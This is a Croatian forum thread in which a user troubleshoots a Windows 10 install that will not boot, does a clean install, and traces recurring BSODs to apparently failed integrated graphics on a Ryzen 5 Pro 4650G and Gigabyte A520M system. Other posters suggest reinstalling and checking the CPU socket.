Ono što sam uspio je, backupirati podatke, tako da je clean install opcija, ali bih ju svakako volio izbjeći zbog raznih softvera koje bi gore trebalo staviti.

Pretpostavljam da je zajeban neki driver i da zato windowsi seru i neće se pokrenut, hardverskih greški nisam našao.

Moja pitanja glase:
1) Postoji li mogućnost inplace upgradea Win 10 "izvana", sa nekog bootabilnog medija, tipa sa Strelecovog WinPEa? Ili s nekim drugim alatom? Milsim da bi to moglo riješiti stvar

2) mogu li ručno probaati iskopirati/zamijeniti neke win sistemske fileove (budući da DISM i SFC neće pokrenut?

Nadopunjavam ako netko naiđe na isti problem - odustao od spašavanja windowsa :D

Probao sam skoro sve sa streleca što je relevantno za problem, znači apsolutno ništa nisam uspio, čak mi ni neke datoteke nije dao kopirat na koji god način probao, pa sam onda instalirao windowse bez formatiranja diska i onda iz Windows.old foldera backupirao ono što nisam upio prije toga, pa nakon toga odradio celan install. Još do sad nisam imao slučaj gdje je WinRE ovako sjeban bio da baš niš nisam mogao uspješno napraviti.

Mislim da je za takve situacije full format jedina razumna opcija. Budeš vidio :D

A znam da je, to sam na kraju i napravio, no uvijek se nekako nadam da ću si skratiti muke, a nakraju si ih srčanjem i isprobavanjem produžim :D

Nego, ispada na kraju da ipak nešto krepade i nije samo softverski, jer, nakon reinstalacije radio komp nekoliko ati tip top, aond as epočeo rušiti uz novi BSOD... A bio sam istestirao sve komponenete osim MBO, sad će bit da je baš MBO u banani.

Citiraj:

Autor Roberto (Post 3780225)

A znam da je, to sam na kraju i napravio, no uvijek se nekako nadam da ću si skratiti muke, a nakraju si ih srčanjem i isprobavanjem produžim :D

Rule of thumb kod Windowsa (a i opcenito)... Ako ce ti troubleshooting trajati duze od 4 sata, radije reinstaliraj...

Roberto, ako nisi, napravi full format i instalaciju, svakako prije nego ideš ploču mijenjati.

Vidi gore, napravio sam clean install. Neću svakako ništa mijenjat dok nisam siguran što je.

Anyways, isprobao drugo napajanje, ram i disk, bez promjene, i onda piknuo unutra opet svoji nvidia 9600gt grafu i s njom sad radi. Znači izgleda nakon svega da je na MBO riknuo grafički modul... Riječ je o ryzenu 5 pro 4650g na gigabyte a520m-2sh ploči.

ryzen 5 pro 4650g > https://www.techpowerup.com/cpu-spec...ro-4650g.c2325
Grafa Radeon Vega 7 je unutar cpu - a.

Ako sada stabilno radi i ne čačka ti se više onda ostavi kako je.

Ako želiš provjeriti šta je sa integriranom grafom treba maknuti add-on grafu, pažljivo skinuti cpu hladnjak, cpu vani, pregledati pinove u socket - u i na cpu,
sve ponovo pažljivo sastaviti, pasta, obratiti pažnju na nasjedanje cpu hladnjaka ..... testiranje ...